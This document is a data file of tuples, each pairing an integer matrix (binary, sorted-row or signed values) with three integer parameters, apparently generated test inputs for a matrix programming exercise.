([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1]],12,15,12,),
([[68, 97, 94, 63, 48, 25, 30, 82, 73, 97, 42, 31, 9, 59, 43, 91, 55, 60, 65, 83, 19, 21, 47, 80, 9, 30, 12, 53, 31, 96, 37, 21, 5], [62, 34, 83, 77, 34, 35, 41, 14, 24, 18, 14, 76, 55, 36, 73, 3, 51, 81, 90, 88, 3, 7, 79, 51, 42, 14, 65, 39, 45, 79, 47, 74, 92], [78, 98, 95, 41, 33, 99, 51, 12, 70, 31, 41, 1, 75, 58, 29, 98, 97, 9, 87, 49, 56, 97, 8, 86, 56, 94, 88, 31, 99, 99, 8, 16, 27], [79, 45, 86, 35, 35, 95, 56, 1, 27, 66, 74, 95, 8, 49, 70, 90, 24, 3, 2, 87, 21, 84, 79, 42, 48, 22, 46, 35, 69, 55, 66, 22, 57], [54, 64, 52, 77, 96, 11, 11, 11, 77, 64, 13, 83, 34, 10, 78, 98, 89, 32, 21, 69, 8, 21, 83, 60, 53, 61, 85, 32, 16, 90, 53, 70, 5], [57, 48, 60, 88, 88, 63, 13, 12, 96, 91, 41, 24, 12, 57, 41, 80, 77, 5, 93, 98, 67, 71, 72, 8, 61, 23, 2, 98, 71, 8, 55, 84, 33], [84, 13, 33, 28, 81, 75, 60, 73, 25, 7, 26, 75, 90, 44, 3, 43, 20, 93, 58, 93, 99, 73, 89, 66, 93, 25, 14, 12, 68, 48, 90, 49, 54], [68, 70, 22, 76, 53, 91, 22, 91, 37, 2, 39, 87, 8, 2, 23, 88, 26, 52, 87, 61, 51, 91, 76, 9, 1, 51, 26, 88, 38, 97, 93, 19, 40], [11, 38, 60, 75, 89, 11, 5, 66, 67, 24, 38, 53, 92, 73, 26, 9, 37, 17, 34, 30, 38, 61, 20, 26, 41, 71, 4, 98, 40, 92, 5, 50, 92], [2, 14, 54, 67, 28, 40, 91, 98, 46, 78, 31, 41, 24, 44, 11, 16, 34, 42, 49, 21, 82, 55, 52, 42, 82, 76, 47, 1, 18, 32, 58, 97, 13], [51, 79, 86, 84, 72, 9, 22, 35, 8, 27, 61, 56, 15, 39, 2, 66, 34, 63, 46, 29, 37, 3, 76, 61, 98, 58, 53, 91, 32, 10, 89, 96, 88], [67, 93, 71, 25, 11, 64, 81, 11, 55, 42, 65, 72, 33, 49, 73, 81, 27, 49, 68, 15, 99, 81, 92, 89, 14, 98, 77, 1, 7, 45, 35, 25, 86], [44, 33, 37, 61, 82, 71, 26, 70, 71, 76, 9, 51, 99, 55, 8, 73, 40, 12, 78, 40, 60, 54, 9, 17, 90, 32, 5, 24, 43, 73, 29, 23, 46], [74, 40, 32, 49, 88, 92, 42, 22, 64, 80, 29, 37, 8, 39, 52, 71, 34, 45, 69, 44, 23, 37, 50, 27, 67, 63, 2, 64, 76, 22, 83, 44, 74], [75, 7, 37, 31, 54, 60, 18, 20, 61, 53, 71, 11, 15, 72, 7, 1, 27, 41, 62, 46, 35, 5, 3, 53, 62, 5, 40, 31, 56, 84, 95, 82, 1], [82, 2, 45, 21, 88, 83, 70, 39, 68, 83, 46, 49, 91, 3, 93, 98, 63, 25, 27, 43, 50, 43, 47, 62, 62, 7, 38, 72, 57, 48, 99, 64, 46], [45, 38, 98, 12, 57, 98, 34, 44, 73, 7, 27, 97, 79, 51, 36, 10, 76, 14, 19, 7, 31, 19, 86, 99, 39, 78, 44, 13, 37, 35, 44, 37, 91], [61, 70, 68, 52, 18, 25, 86, 19, 3, 28, 2, 35, 82, 40, 38, 57, 55, 2, 6, 98, 73, 68, 96, 98, 21, 72, 2, 8, 48, 13, 96, 36, 25], [99, 25, 21, 80, 47, 21, 29, 49, 24, 99, 40, 57, 59, 36, 13, 65, 15, 56, 45, 32, 97, 68, 71, 7, 19, 54, 1, 19, 38, 85, 28, 65, 98], [38, 93, 22, 1, 1, 79, 75, 87, 39, 49, 15, 66, 97, 98, 40, 73, 33, 78, 77, 27, 60, 45, 55, 89, 10, 93, 72, 78, 40, 40, 64, 59, 62], [87, 55, 14, 80, 62, 56, 91, 80, 1, 16, 60, 84, 55, 34, 38, 92, 1, 70, 67, 68, 93, 81, 73, 56, 35, 90, 73, 87, 33, 87, 55, 99, 99], [26, 75, 52, 1, 78, 3, 57, 85, 36, 21, 18, 51, 26, 30, 45, 95, 24, 97, 75, 68, 36, 93, 92, 37, 88, 43, 37, 29, 94, 83, 96, 38, 65], [98, 30, 29, 8, 74, 61, 86, 22, 14, 49, 93, 47, 66, 4, 7, 39, 58, 62, 32, 95, 34, 23, 65, 9, 21, 47, 45, 44, 12, 98, 91, 92, 28], [37, 35, 69, 31, 40, 54, 30, 30, 37, 4, 17, 33, 24, 75, 25, 84, 59, 66, 96, 92, 87, 56, 48, 16, 32, 89, 39, 44, 30, 73, 24, 48, 47], [83, 82, 6, 7, 25, 91, 38, 58, 10, 20, 79, 35, 18, 7, 87, 56, 31, 51, 15, 98, 22, 29, 61, 2, 12, 78, 7, 91, 77, 63, 87, 87, 18], [35, 75, 62, 70, 16, 58, 92, 60, 32, 16, 24, 9, 78, 25, 76, 54, 75, 16, 50, 2, 19, 69, 29, 92, 34, 59, 58, 12, 94, 45, 62, 89, 12], [14, 83, 42, 74, 93, 58, 96, 94, 25, 30, 81, 26, 47, 36, 26, 8, 33, 70, 94, 96, 99, 64, 96, 25, 36, 88, 49, 39, 60, 6, 43, 24, 65], [52, 96, 76, 29, 65, 68, 26, 21, 13, 75, 49, 52, 47, 10, 16, 97, 51, 87, 73, 86, 5, 99, 48, 40, 27, 37, 58, 60, 1, 49, 2, 26, 48], [22, 81, 11, 10, 42, 96, 27, 51, 69, 8, 92, 12, 41, 93, 75, 30, 18, 12, 98, 4, 61, 6, 43, 55, 72, 41, 92, 91, 49, 21, 74, 49, 5], [97, 63, 36, 47, 3, 35, 51, 12, 85, 90, 99, 2, 37, 31, 19, 1, 25, 52, 61, 37, 60, 11, 37, 35, 53, 17, 95, 77, 12, 42, 41, 71, 30], [77, 40, 69, 61, 43, 22, 79, 66, 52, 28, 34, 37, 19, 26, 51, 17, 13, 79, 38, 87, 63, 98, 24, 15, 99, 70, 85, 63, 2, 78, 6, 9, 13], [18, 86, 88, 50, 35, 77, 66, 32, 72, 8, 54, 10, 11, 64, 35, 22, 50, 43, 58, 28, 61, 9, 47, 33, 92, 64, 69, 38, 1, 73, 77, 49, 58], [84, 47, 49, 83, 59, 14, 86, 10, 76, 62, 25, 16, 59, 72, 45, 41, 52, 24, 90, 18, 44, 73, 56, 69, 30, 79, 90, 4, 33, 27, 72, 87, 37]],18,17,20,),
([[-20, -14, 14, 84], [-34, -24, 46, 96], [18, 36, 66, 80], [-32, 28, 58, 94]],3,3,3,),
([[0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1], [0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0], [1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1], [1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0], [0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1], [1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1], [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1], [1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0], [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0], [0, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0], [1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0], [1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1], [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1], [1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1], [1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1, 0], [0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0], [0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 0, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0], [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1], [1, 1, 0, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0], [1, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0], [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0], [0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 1, 0], [0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1], [0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1], [0, 0, 0, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0]],14,25,17,),
([[2, 3, 4, 9, 11, 11, 11, 12, 15, 15, 19, 20, 20, 23, 24, 25, 29, 29, 29, 33, 34, 38, 41, 41, 44, 46, 48, 54, 54, 58, 60, 61, 62, 62, 62, 68, 68, 72, 73, 79, 79, 80, 83, 86, 92, 99, 99], [3, 3, 4, 4, 4, 6, 12, 16, 17, 17, 18, 18, 18, 19, 19, 21, 25, 28, 29, 30, 30, 32, 35, 38, 39, 42, 50, 53, 61, 65, 65, 65, 70, 71, 75, 80, 81, 84, 84, 89, 92, 92, 95, 95, 96, 98, 99], [2, 4, 7, 9, 10, 14, 17, 21, 22, 23, 24, 28, 29, 31, 31, 33, 33, 37, 37, 38, 39, 41, 42, 42, 45, 48, 48, 58, 60, 62, 63, 66, 73, 73, 75, 76, 76, 80, 83, 85, 86, 86, 91, 94, 99, 99, 99], [1, 1, 3, 6, 6, 6, 8, 12, 16, 17, 18, 24, 25, 27, 30, 33, 35, 39, 39, 41, 45, 48, 50, 50, 53, 53, 53, 55, 56, 57, 58, 60, 64, 69, 71, 73, 73, 74, 76, 78, 82, 84, 85, 93, 94, 98, 99], [1, 1, 4, 7, 9, 9, 14, 14, 16, 16, 19, 24, 24, 25, 25, 27, 28, 28, 30, 32, 34, 34, 36, 37, 38, 39, 41, 41, 45, 47, 54, 56, 57, 63, 66, 67, 71, 72, 79, 82, 83, 83, 83, 91, 92, 97, 97], [5, 8, 8, 9, 9, 14, 15, 18, 18, 22, 22, 24, 25, 25, 28, 28, 29, 29, 36, 38, 50, 56, 62, 63, 69, 69, 69, 70, 70, 70, 70, 74, 76, 80, 80, 84, 85, 87, 89, 89, 89, 89, 96, 97, 97, 98, 98], [1, 3, 6, 6, 8, 9, 10, 11, 14, 16, 20, 21, 21, 26, 27, 27, 29, 30, 37, 37, 38, 43, 43, 47, 47, 47, 48, 50, 51, 52, 53, 59, 59, 60, 61, 65, 65, 67, 71, 71, 78, 83, 87, 88, 88, 90, 99], [1, 1, 3, 6, 7, 8, 8, 13, 13, 14, 14, 17, 17, 18, 20, 25, 28, 29, 29, 30, 31, 33, 34, 38, 40, 43, 49, 50, 53, 56, 61, 62, 63, 64, 69, 70, 75, 81, 85, 88, 90, 91, 93, 93, 94, 95, 97], [1, 4, 5, 6, 6, 6, 6, 7, 10, 13, 13, 16, 21, 25, 26, 27, 32, 32, 33, 37, 37, 40, 43, 45, 47, 50, 51, 52, 53, 56, 58, 60, 61, 61, 67, 70, 75, 78, 82, 83, 85, 85, 86, 90, 92, 94, 94], [3, 5, 5, 5, 10, 10, 12, 14, 15, 16, 19, 20, 27, 29, 30, 32, 39, 40, 40, 40, 46, 49, 50, 53, 56, 58, 59, 59, 59, 59, 61, 65, 68, 76, 80, 83, 83, 85, 86, 87, 88, 89, 89, 89, 91, 93, 95], [2, 2, 7, 10, 10, 11, 11, 12, 15, 18, 21, 23, 24, 26, 27, 30, 32, 33, 33, 34, 35, 35, 35, 36, 38, 39, 40, 41, 41, 43, 43, 45, 50, 51, 56, 60, 62, 73, 74, 76, 76, 79, 87, 89, 89, 90, 99], [2, 3, 8, 10, 10, 15, 15, 15, 22, 22, 25, 26, 28, 28, 29, 32, 34, 36, 36, 37, 39, 39, 40, 41, 44, 46, 47, 54, 55, 58, 67, 69, 69, 70, 70, 71, 72, 84, 84, 85, 89, 91, 93, 96, 96, 97, 98], [2, 5, 6, 6, 12, 12, 17, 18, 19, 19, 21, 22, 27, 37, 37, 38, 40, 41, 50, 53, 54, 57, 58, 61, 62, 63, 64, 70, 71, 72, 72, 72, 77, 77, 79, 80, 84, 88, 90, 91, 93, 97, 97, 98, 98, 99, 99], [1, 1, 2, 5, 9, 12, 14, 18, 18, 18, 19, 20, 21, 26, 27, 36, 37, 40, 41, 43, 46, 46, 47, 48, 51, 51, 53, 54, 59, 63, 67, 67, 68, 69, 74, 74, 74, 77, 80, 81, 83, 83, 83, 86, 90, 92, 99], [4, 4, 9, 9, 9, 9, 11, 11, 12, 12, 18, 18, 19, 25, 26, 26, 27, 27, 30, 33, 33, 35, 42, 42, 43, 45, 47, 47, 50, 51, 52, 55, 57, 61, 67, 70, 70, 70, 72, 73, 77, 78, 81, 82, 84, 91, 96], [2, 3, 5, 5, 5, 8, 11, 12, 12, 13, 17, 23, 27, 28, 30, 33, 34, 35, 36, 40, 40, 42, 42, 42, 45, 47, 51, 51, 52, 52, 64, 65, 71, 72, 76, 80, 80, 85, 87, 87, 88, 93, 94, 96, 97, 97, 98], [4, 12, 13, 15, 16, 17, 19, 20, 23, 23, 25, 32, 34, 34, 35, 37, 37, 40, 40, 41, 48, 53, 54, 59, 59, 61, 62, 63, 65, 65, 67, 71, 72, 74, 79, 79, 81, 82, 83, 84, 85, 87, 87, 91, 92, 93, 98], [3, 5, 9, 10, 14, 15, 19, 21, 24, 26, 30, 33, 37, 39, 44, 46, 46, 47, 53, 53, 54, 55, 56, 56, 57, 58, 66, 71, 72, 72, 73, 74, 76, 77, 80, 81, 83, 85, 88, 91, 92, 95, 96, 97, 97, 97, 98], [2, 8, 8, 8, 9, 11, 12, 17, 25, 25, 26, 26, 27, 33, 38, 39, 39, 41, 41, 44, 44, 45, 46, 46, 48, 50, 51, 53, 57, 61, 65, 67, 69, 77, 77, 79, 81, 82, 83, 84, 85, 88, 90, 91, 96, 97, 97], [2, 5, 7, 13, 15, 16, 21, 33, 34, 36, 37, 39, 40, 43, 45, 46, 47, 51, 51, 54, 55, 59, 62, 69, 70, 71, 71, 71, 72, 74, 75, 75, 76, 78, 78, 80, 81, 82, 82, 83, 84, 87, 88, 88, 91, 97, 98], [3, 4, 7, 9, 10, 10, 10, 11, 14, 15, 15, 16, 17, 18, 19, 22, 26, 27, 30, 40, 42, 43, 44, 46, 47, 48, 52, 54, 57, 59, 63, 64, 65, 66, 69, 72, 73, 73, 78, 78, 79, 81, 86, 87, 90, 91, 92], [2, 4, 10, 10, 12, 14, 19, 21, 23, 24, 28, 30, 32, 35, 38, 38, 39, 40, 42, 44, 45, 49, 55, 55, 55, 56, 57, 61, 66, 70, 71, 74, 78, 80, 80, 81, 81, 82, 82, 82, 83, 84, 84, 85, 90, 93, 94], [3, 8, 9, 13, 14, 14, 18, 18, 22, 24, 24, 25, 29, 29, 35, 36, 36, 37, 38, 39, 40, 43, 44, 44, 46, 55, 57, 61, 62, 63, 67, 67, 69, 72, 72, 74, 74, 79, 79, 84, 85, 87, 88, 89, 92, 96, 97], [1, 1, 9, 10, 10, 16, 17, 20, 29, 30, 32, 35, 36, 37, 40, 41, 41, 42, 43, 43, 46, 53, 54, 58, 58, 59, 60, 60, 60, 67, 68, 69, 71, 73, 76, 80, 80, 82, 85, 85, 85, 89, 95, 96, 96, 97, 97], [1, 5, 6, 7, 9, 13, 14, 18, 20, 21, 26, 27, 31, 31, 34, 37, 39, 43, 45, 45, 45, 48, 51, 52, 54, 58, 61, 62, 64, 65, 69, 70, 70, 73, 75, 76, 80, 82, 83, 87, 88, 90, 90, 90, 93, 94, 96], [3, 5, 15, 15, 15, 16, 19, 20, 25, 26, 27, 30, 31, 31, 33, 34, 35, 37, 37, 49, 52, 55, 56, 59, 59, 62, 63, 63, 69, 70, 71, 72, 73, 76, 77, 78, 80, 81, 83, 86, 88, 90, 91, 92, 93, 94, 96], [3, 4, 6, 7, 8, 19, 19, 22, 24, 24, 28, 28, 33, 35, 38, 39, 42, 47, 47, 47, 48, 49, 50, 52, 53, 55, 57, 59, 60, 67, 70, 79, 79, 80, 80, 81, 83, 84, 85, 86, 88, 88, 89, 93, 94, 95, 96], [2, 3, 3, 5, 6, 7, 9, 9, 11, 13, 14, 16, 16, 17, 21, 23, 25, 28, 29, 33, 34, 37, 39, 42, 43, 50, 52, 56, 56, 56, 57, 58, 62, 69, 71, 74, 76, 76, 79, 82, 85, 85, 90, 94, 94, 95, 97], [9, 11, 23, 26, 27, 28, 30, 30, 32, 33, 33, 33, 34, 36, 37, 45, 46, 46, 46, 46, 46, 49, 51, 51, 52, 56, 61, 61, 62, 63, 64, 66, 67, 70, 76, 76, 80, 85, 86, 91, 91, 92, 93, 94, 97, 98, 99], [2, 3, 3, 4, 6, 6, 10, 11, 12, 15, 17, 18, 18, 18, 19, 20, 22, 24, 24, 28, 31, 32, 33, 35, 35, 36, 39, 40, 44, 50, 55, 59, 61, 65, 66, 67, 70, 72, 74, 78, 78, 82, 83, 91, 92, 94, 97], [1, 3, 7, 11, 13, 13, 16, 19, 19, 21, 22, 24, 26, 29, 29, 30, 30, 41, 43, 44, 47, 52, 58, 59, 59, 60, 60, 60, 66, 67, 68, 70, 73, 77, 79, 85, 85, 86, 87, 88, 90, 91, 93, 95, 97, 98, 99], [1, 1, 3, 4, 4, 4, 6, 7, 8, 8, 11, 11, 12, 13, 18, 21, 23, 23, 23, 25, 25, 26, 27, 40, 40, 48, 49, 53, 56, 58, 59, 60, 62, 62, 64, 66, 69, 80, 82, 84, 88, 88, 90, 91, 93, 97, 98], [4, 4, 5, 6, 8, 9, 12, 14, 16, 19, 24, 29, 30, 35, 36, 36, 38, 40, 41, 42, 42, 45, 54, 58, 59, 60, 62, 65, 65, 66, 68, 69, 71, 76, 78, 80, 81, 82, 83, 87, 87, 88, 89, 90, 93, 94, 98], [1, 2, 4, 5, 5, 6, 7, 10, 17, 19, 21, 26, 30, 32, 33, 33, 34, 37, 40, 43, 44, 47, 48, 48, 54, 56, 56, 56, 57, 62, 64, 65, 67, 69, 76, 78, 80, 82, 83, 84, 86, 90, 93, 93, 93, 94, 99], [3, 4, 7, 7, 13, 15, 17, 18, 22, 24, 25, 25, 26, 27, 28, 33, 35, 36, 41, 45, 47, 47, 50, 52, 53, 54, 57, 57, 59, 62, 65, 73, 73, 75, 75, 76, 77, 78, 78, 79, 79, 79, 81, 82, 83, 90, 99], [3, 6, 12, 15, 17, 17, 22, 22, 22, 23, 26, 27, 27, 31, 34, 35, 46, 52, 54, 55, 56, 58, 61, 61, 62, 63, 64, 65, 65, 71, 72, 73, 77, 79, 79, 81, 81, 82, 87, 89, 91, 91, 94, 95, 96, 97, 97], [2, 4, 8, 12, 13, 15, 16, 18, 22, 22, 23, 24, 24, 26, 26, 26, 31, 32, 33, 35, 37, 38, 38, 38, 49, 49, 51, 53, 54, 55, 57, 64, 64, 67, 74, 75, 79, 80, 83, 84, 84, 85, 86, 87, 88, 92, 99], [2, 4, 4, 4, 5, 13, 15, 17, 18, 21, 21, 22, 23, 24, 28, 28, 30, 31, 34, 35, 35, 36, 41, 44, 44, 46, 47, 58, 59, 62, 63, 64, 66, 67, 67, 69, 70, 74, 81, 82, 84, 87, 89, 91, 92, 94, 97], [3, 3, 4, 6, 8, 10, 13, 13, 16, 16, 16, 16, 21, 30, 32, 32, 33, 33, 35, 40, 44, 45, 46, 46, 47, 47, 51, 62, 63, 65, 66, 70, 74, 75, 76, 78, 81, 82, 84, 85, 87, 87, 89, 90, 99, 99, 99], [2, 4, 5, 6, 6, 8, 9, 14, 15, 16, 18, 18, 18, 19, 19, 21, 23, 23, 23, 27, 27, 28, 29, 31, 37, 38, 38, 39, 40, 42, 47, 51, 54, 61, 70, 76, 79, 82, 83, 90, 90, 91, 92, 93, 95, 96, 97], [3, 3, 4, 7, 8, 8, 9, 10, 11, 14, 16, 19, 20, 21, 21, 29, 31, 37, 38, 40, 47, 50, 52, 53, 53, 54, 57, 59, 64, 65, 67, 67, 68, 73, 75, 82, 83, 84, 85, 87, 88, 91, 92, 92, 92, 94, 95], [4, 4, 4, 6, 9, 14, 15, 16, 17, 19, 25, 29, 29, 31, 33, 33, 34, 38, 38, 42, 42, 42, 43, 44, 46, 47, 52, 52, 53, 54, 61, 61, 63, 66, 68, 69, 71, 73, 75, 80, 86, 91, 92, 93, 96, 98, 99], [2, 2, 8, 8, 9, 10, 10, 12, 13, 15, 15, 22, 24, 25, 26, 30, 35, 38, 38, 40, 40, 42, 52, 54, 57, 58, 60, 63, 63, 63, 64, 64, 66, 70, 72, 72, 73, 77, 77, 80, 83, 87, 87, 88, 89, 90, 95], [3, 4, 4, 5, 6, 6, 8, 9, 12, 14, 15, 16, 19, 22, 24, 25, 25, 27, 32, 35, 38, 38, 39, 40, 41, 42, 44, 47, 50, 52, 54, 54, 55, 58, 64, 69, 73, 74, 74, 78, 79, 86, 89, 90, 91, 92, 99], [2, 2, 2, 3, 6, 6, 11, 12, 13, 14, 15, 17, 17, 19, 22, 24, 29, 33, 36, 42, 45, 45, 45, 46, 48, 49, 51, 51, 52, 52, 65, 67, 67, 69, 70, 72, 80, 81, 81, 86, 89, 89, 91, 92, 93, 93, 97], [2, 6, 7, 13, 15, 22, 22, 27, 27, 28, 32, 36, 36, 36, 39, 41, 43, 44, 44, 45, 47, 48, 51, 53, 55, 56, 59, 60, 61, 61, 61, 64, 67, 69, 69, 69, 69, 70, 74, 80, 83, 84, 87, 91, 92, 95, 98], [6, 7, 7, 11, 11, 12, 12, 16, 16, 19, 19, 21, 26, 26, 28, 35, 36, 37, 41, 41, 42, 45, 54, 54, 63, 65, 67, 67, 69, 76, 77, 78, 81, 83, 83, 84, 85, 85, 88, 90, 90, 91, 93, 94, 96, 97, 98]],37,28,34,),
([[-18, -42, 20, -30, 0, 30, 22, -64, 2, 74, 54, 34, -22, -34, -22, -46, 46, 70, 74, -62, -84, -96, -34, -26], [40, -94, -42, -84, 8, -8, 40, 24, 62, -18, -42, 22, 50, -72, 0, 86, 20, 74, -66, -34, 2, 72, 68, -44], [-32, -82, -4, 98, 54, -46, 84, 16, 76, 68, 86, -58, 58, 58, -92, -90, -68, 16, 94, -84, 26, 68, -64, 86], [-64, 58, 6, -46, -84, -96, 14, 24, -96, -58, -36, -26, 30, -48, 4, -96, 18, 80, 60, 98, 72, -20, 0, -46], [-70, 58, 50, -70, 16, -18, 62, -84, 44, -98, 42, -2, 78, 78, 46, 60, 34, -16, 4, -52, -40, 16, -32, -82], [74, 54, 74, 14, 16, 28, -94, 42, -66, 40, 90, 84, -90, 28, -98, 26, -70, -2, -56, 88, 72, -44, 58, 36], [30, -48, -16, -54, -96, -46, 6, -28, -62, 76, 6, -14, 70, 2, -46, -14, -38, 72, -10, 60, -68, 92, 26, -2], [-80, -34, 18, 4, -56, -78, 18, -14, 20, 38, 38, 10, 8, 8, 44, 30, 18, -48, -64, 60, 28, -24, -76, 90], [-44, 12, 40, -40, -72, -74, -18, -86, -96, -24, 22, -80, 28, 62, 16, -28, -34, -86, -88, 66, 24, 30, 4, 54], [20, 44, -2, 0, 52, 52, -24, -88, 4, 6, -94, 96, -44, -68, -64, 34, -18, 44, 76, -16, 64, 36, -98, -88], [-58, -38, 6, -96, 2, -30, -94, -76, -82, -16, -36, -52, 0, -66, 52, -84, 4, 84, -32, -32, -16, -46, -24, -58], [-62, -18, 14, 56, 58, 68, -32, -46, -86, 58, -86, 36, -82, -98, 28, -8, 46, 76, -24, -38, -76, 74, 84, -86], [-38, 76, -48, -54, 80, 36, -86, -64, 68, -72, -70, 14, 14, -72, 46, -54, -98, -66, 36, 12, -74, 84, 76, 98], [62, -38, -70, 86, 40, 82, -70, -54, -90, -26, 86, 4, -66, 36, 22, 54, -30, 44, -36, 68, 2, -8, 78, -46], [-26, -26, -96, 16, -10, 98, -58, 30, -42, 26, 32, -74, 8, -74, 44, 46, -82, 94, 6, 0, -82, 32, 88, 0], [88, 54, -90, 82, -28, -96, 62, 64, 24, 72, 80, -30, -78, 62, -16, -48, -70, 78, 88, -30, 44, -40, -78, -14], [-74, -78, -46, -2, -2, 28, -8, 72, -44, 86, -26, -14, 84, 26, 72, 30, -4, 72, 92, 24, 98, 98, -80, 10], [-54, 68, 86, -14, 54, 86, -60, 40, 18, -32, 34, 22, 14, -36, 92, -42, 34, 86, -8, 60, -14, 6, -68, -16], [30, 82, -14, -60, 48, 30, 32, -42, 52, 48, 72, 30, -22, 16, -28, -92, -66, -90, -80, 86, 52, 92, -10, 20], [82, -78, -86, -80, -96, 60, -96, -14, 24, -42, 6, 66, 84, -16, -80, -38, 38, -90, -34, 16, 26, 82, -20, -42], [-36, -28, 86, 20, 88, -16, -40, 30, -26, 24, 18, -42, 68, -72, -42, -54, -86, -14, -86, -16, -58, 88, 94, 74], [62, -88, -18, -50, -36, -66, 74, 88, 54, -36, -70, 48, -68, 64, 70, 60, 28, 88, -60, 18, -70, -20, 70, 24], [-70, -16, -74, -6, 60, 8, 80, -72, -96, 62, -34, 8, 62, 48, -20, -92, -82, 60, 58, 80, 40, -34, 48, -40], [-48, 42, 64, -36, 28, -46, -68, 16, -42, 16, -34, 6, 78, 52, 38, -84, 90, 4, -94, -56, -30, -72, -36, -28]],16,18,22,),
